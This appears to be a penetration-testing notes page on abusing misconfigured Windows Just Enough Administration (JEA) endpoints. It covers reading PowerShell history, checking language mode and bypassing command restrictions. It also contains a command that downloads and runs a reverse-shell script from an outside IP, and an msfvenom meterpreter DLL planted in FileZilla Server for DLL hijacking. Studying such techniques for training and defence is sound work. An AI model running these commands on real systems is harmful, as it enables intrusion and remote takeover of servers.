Just Enough Administration (JEA)

> Windows Server 2016 ; need WinRM enabled on the endpoint to accept user connections ; is enforced by PowerShell and not Active Directory ; dependent on PS-Remoting

Pre-requiste:
1. performed lateral movement & gained access to multiple systems & users
(2. obtained password/hash to rdp)

a misconfigured JEA might grant extensive permissions that attackers could exploit

Enumeration

@compromised host

#see PS history file path & view command history
(Get-PSReadlineOption).HistorySavePath

type C:\Users\mary\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

#replicate remote access command that found in history file
Enter-PSSession -ComputerName files02 -ConfigurationName j_fs02

@remote session shell

##in remote session @ new powershell window##
#enum in remote session
whoami

[System.Security.Principal.WindowsIdentity]::GetCurrent().Name

$ExecutionContext.SessionState.LanguageMode

#seek for non-default command, e.g. Copy-Item
Get-Command
#the commands available to us will be executed with administrative privileges on the machine

Default commands that normally work in PowerShell do not work here.

-ConfigurationName flag is not standard for a typical WinRM connection

Based on the output, we are operating in a NoLanguageMode (JEA config SessionType: RestrictedRemoteServer)

If the SessionType in JEA is set to Default, we would operate in FullLanguage mode and be able to create our own functions. With a JEA configuration, this essentially means full administrative access to the target.

function my-function { powershell -nop -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.129.114/rev.ps1')" }

my-function

#basic JEA PS command restriction bypass:#
& {whoami}

Abuse available non-default command

##in remote session @ new powershell window##
#seeing also the available access location from command history above (-Destination)
Copy-Item -Path 'C:\Windows\System32\drivers\etc\hosts' -Destination 'C:\shares\home\mary'

##in originating compromised host##
type \\files02\home$\mary\hosts

We can add a malicious payload to the C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ folder. By default, anything stored in the folder will be executed under the context of the user logging in. However, this does not guarantee high privileges and the chances that someone will log in to the server is rather small.

Another option is to attempt a form of DLL hijacking that makes use of the DLL search order in Windows.

The directory from which the application is loaded (E.g. C:\Program Files\application)
The system directory (C:\Windows\System32)
The 16-bit system directory
The Windows directory
The current directory
Directories that are listed in the PATH environment variable

If we can find out which non-existent DLLs Windows is attempting to load from the directory where the service is loaded, we should be able to add our own DLL containing a payload.

Copy-Item in admin privilege can replace any existing DLLs to load for a service.

In a JEA setting, numerous PowerShell commands can potentially bypass the established restrictions, posing significant security risks. For instance, Invoke-Expression, Start-Process, and Invoke-Command are just a few that should be avoided due to their potential misuse.

Abusing FileZilla

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.48.4 LPORT=443 -a x64 --platform windows -f dll > msasn1.dll

#place the malicious dll to \\files02\home$\mary\ in originating host
Enter-PSSession -ComputerName files02 -ConfigurationName j_fs02

#in remote session shell#
copy-item C:\shares\home\mary\msasn1.dll -destination "C:\Program Files\FileZilla Server\msasn1.dll"
#wait for reboot to restart the service in loading the tempered dll

PreviousForest NextJust-In-Time (JIT) Access

Last updated 9 months ago